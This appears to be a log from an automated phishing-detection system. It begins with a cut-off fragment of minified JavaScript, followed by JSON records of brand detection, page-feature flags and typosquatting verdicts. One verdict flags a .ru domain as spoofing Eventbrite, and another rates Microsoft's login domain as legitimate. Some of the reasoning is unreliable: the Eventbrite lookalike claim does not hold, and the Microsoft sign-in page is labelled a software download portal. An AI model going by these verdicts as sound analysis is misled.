m(e,t){switch(t=E(t)?t:w.AWTPropertyType.Unspecified){case w.AWTPropertyType.Unspecified:return S(e);case w.AWTPropertyType.String:return o(e)?t:D;case w.AWTPropertyType.Boolean:return a(e)?t:D;case w.AWTPropertyType.Date:return u(e)&&NaN!==e.getTime()?t:D;case w.AWTPropertyType.Int64:return s(e)&&e%1==0?t:D;case w.AWTPropertyType.Double:return s

{
  "brands": "unknown"
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false,
  "page_classification": "unknown"
}

{
  "brands": [
    "Cloudflare"
  ]
}

```json{  "brand": "Eventbrite",  "brand_classification": "known",  "legit_url": "https://www.eventbrite.com",  "similarity": 6,  "spoofed": 7,  "reasoning": "The URL '3o1w.peativerthera.ru' appears to be a typosquatting attempt on 'Eventbrite'. The subdomain '3o1w' does not have a clear meaning and could be an attempt to confuse users. The main domain 'peativerthera' is visually similar to 'Eventbrite', with character substitutions such as 'e' for 'i' and 'v' for 'b', and additional letters 'thera' that do not contribute to a legitimate brand name. The use of the '.ru' domain extension could suggest a different geographical focus, but it is more likely intended to mislead users into thinking they are interacting with Eventbrite. The structural and character-level similarities, combined with the unusual domain extension, increase the likelihood of this being a typosquatting attempt."}

URL: https://3o1w.peativerthera.ru

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false,
  "page_classification": "unknown"
}

```json{  "brand": "Microsoft",  "brand_classification": "wellknown",  "legit_url": "https://login.microsoftonline.com",  "similarity": 10,  "spoofed": 0,  "reasoning": "The URL 'https://login.microsoftonline.com' is a legitimate and well-known domain used by Microsoft for its online services, particularly for authentication and login purposes. There are no character substitutions, visual similarities, or structural changes that suggest typosquatting. The domain 'microsoftonline.com' is directly associated with Microsoft, and the subdomain 'login' is contextually appropriate for its purpose. There is no indication of a different legitimate purpose unrelated to the brand, and the URL is not misleading or confusing for users familiar with Microsoft's services."}

URL: https://login.microsoftonline.com

{
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "software download portal"
}

{
  "brands": [
    "Cloudflare"
  ]
}

{
  "brands": [
    "Microsoft"
  ]
}